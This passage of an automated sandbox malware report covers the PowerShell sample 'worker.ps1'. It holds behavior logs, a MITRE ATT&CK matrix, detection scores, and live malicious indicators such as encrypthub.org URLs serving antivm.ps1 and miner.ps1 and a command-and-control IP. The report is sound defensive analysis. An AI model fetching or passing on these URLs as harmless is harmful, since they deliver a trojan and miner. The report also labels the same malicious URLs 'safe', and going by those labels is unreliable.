        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
        Windows Management Instrumentation        		1
        DLL Side-Loading        		11
        Process Injection        		1
        Masquerading        		OS Credential Dumping221
        Security Software Discovery        		Remote Services1
        Email Collection        		11
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        PowerShell        		Boot or Logon Initialization Scripts1
        DLL Side-Loading        		241
        Virtualization/Sandbox Evasion        		LSASS Memory1
        Process Discovery        		Remote Desktop Protocol1
        Archive Collected Data        		1
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
        Process Injection        		Security Account Manager241
        Virtualization/Sandbox Evasion        		SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Obfuscated Files or Information        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput Capture13
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Software Packing        		LSA Secrets1
        System Network Configuration Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading        		Cached Domain Credentials2
        File and Directory Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync33
        System Information Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        worker.ps116%VirustotalBrowse
        worker.ps111%ReversingLabs

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://encrypthub.org/main/antivm.ps10%Avira URL Cloudsafe
        https://encrypthub.org/main/zakrep/worker.ps10%Avira URL Cloudsafe
        http://crl.microcG.l.0%Avira URL Cloudsafe
        http://encrypthub.org:80800%Avira URL Cloudsafe
        https://encrypthub.org/main/marko/miner.ps10%Avira URL Cloudsafe
        https://encrypthub.org/panel/0%Avira URL Cloudsafe
        https://encrypthub.org0%Avira URL Cloudsafe
        http://encrypthub.org0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        ident.me
        		49.12.234.183
        		truefalse
          		high
          encrypthub.org
          		146.70.233.10
          		truetrue
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://ident.me/false
              		high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.4189123994.00000279D2DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://encrypthub.orgpowershell.exe, 00000000.00000002.4159251650.00000279C4860000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4159251650.00000279C4837000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4159251650.00000279C482B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4159251650.00000279C48C8000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://crl.microcG.l.powershell.exe, 00000000.00000002.4194333216.00000279DB1B8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://encrypthub.org/main/zakrep/worker.ps1worker.ps1true
                        • Avira URL Cloud: safe
                        		unknown
                        https://ident.me/ppowershell.exe, 00000000.00000002.4159251650.00000279C3F5C000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://ip-api.com/jsonpowershell.exe, 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmp, worker.ps1false
                            		high
                            https://contoso.com/Licensepowershell.exe, 00000000.00000002.4189123994.00000279D2DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/Iconpowershell.exe, 00000000.00000002.4189123994.00000279D2DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://aka.ms/pscore6powershell.exe, 00000002.00000002.1738126221.000001F2BFABB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://encrypthub.org:8080powershell.exe, 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmp, worker.ps1false
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://ident.mepowershell.exe, 00000000.00000002.4159251650.00000279C4086000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://encrypthub.org/panel/powershell.exe, 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4159251650.00000279C48C8000.00000004.00000800.00020000.00000000.sdmp, worker.ps1false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://contoso.com/powershell.exe, 00000000.00000002.4189123994.00000279D2DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.4189123994.00000279D2DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://ifconfig.mepowershell.exe, 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmp, worker.ps1false
                                              		high
                                              https://ident.mepowershell.exe, 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmp, worker.ps1false
                                                		high
                                                https://aka.ms/pscore68powershell.exe, 00000000.00000002.4159251650.00000279C2D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1738126221.000001F2BFADE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://encrypthub.org/main/antivm.ps1powershell.exe, 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmp, worker.ps1false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.4159251650.00000279C2D41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1738126221.000001F2BFB06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://encrypthub.org/main/marko/miner.ps1powershell.exe, 00000000.00000002.4159251650.00000279C2F68000.00000004.00000800.00020000.00000000.sdmp, worker.ps1false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://crl.microspowershell.exe, 00000000.00000002.4194037288.00000279DAF50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://encrypthub.orgpowershell.exe, 00000000.00000002.4159251650.00000279C4860000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4159251650.00000279C4602000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4159251650.00000279C4837000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4159251650.00000279C48C8000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      146.70.233.10
                                                      		encrypthub.orgUnited Kingdom
                                                      		2018TENET-1ZAtrue
                                                      49.12.234.183
                                                      		ident.meGermany
                                                      		24940HETZNER-ASDEfalse

                                                      General Information

                                                      Joe Sandbox version:42.0.0 Malachite
                                                      Analysis ID:1592722
                                                      Start date and time:2025-01-16 13:19:07 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 7m 58s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:13
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:worker.ps1
                                                      Detection:MAL
                                                      Classification:mal100.troj.evad.winPS1@9/13@2/2
                                                      EGA Information:Failed
                                                      HCA Information:
                                                      • Successful, ratio: 63%
                                                      • Number of executed functions: 15
                                                      • Number of non-executed functions: 1
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .ps1
                                                      • Override analysis time to 240s for powershell

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target powershell.exe, PID 7144 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      07:20:01API Interceptor14959210x Sleep call for process: powershell.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      146.70.233.10file.exeGet hashmaliciousHackBrowser, XmrigBrowse
                                                      • encrypthub.net:8080/?method=Callback
                                                      49.12.234.1833Lf408k9mg.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                                      • v4.ident.mehttp://v4.ident.me?Z73739566013Q1
                                                      dGCnwOnxb1.elfGet hashmaliciousIPStormBrowse
                                                      • ident.me/

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      encrypthub.orgSJkUU4ScMe.msiGet hashmaliciousUnknownBrowse
                                                      • 146.70.233.10
                                                      iPv1RzhF56.msiGet hashmaliciousUnknownBrowse
                                                      • 146.70.233.10
                                                      DingTalk_v7.6.38.122510801.msiGet hashmaliciousUnknownBrowse
                                                      • 146.70.233.10
                                                      ident.mefile.exeGet hashmaliciousHackBrowser, XmrigBrowse
                                                      • 49.12.234.183
                                                      SecuriteInfo.com.Trojan.DownLoader47.7362.16444.30811.exeGet hashmaliciousUnknownBrowse
                                                      • 49.12.234.183
                                                      SecuriteInfo.com.Trojan.DownLoader47.7362.16444.30811.exeGet hashmaliciousUnknownBrowse
                                                      • 49.12.234.183
                                                      dGCnwOnxb1.elfGet hashmaliciousIPStormBrowse
                                                      • 49.12.234.183
                                                      B0MdnLnOIa.elfGet hashmaliciousIPStormBrowse
                                                      • 49.12.234.183
                                                      A8ibgLBZ6i.exeGet hashmaliciousXmrigBrowse
                                                      • 176.58.123.25
                                                      kgheowd.dllGet hashmaliciousTrickbotBrowse
                                                      • 176.58.123.25
                                                      oNWAIKp9v5.dllGet hashmaliciousTrickBotBrowse
                                                      • 176.58.123.25
                                                      panther.dllGet hashmaliciousTrickBotBrowse
                                                      • 176.58.123.25
                                                      9360.xlsmGet hashmaliciousHidden Macro 4.0 TrickBotBrowse
                                                      • 176.58.123.25

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
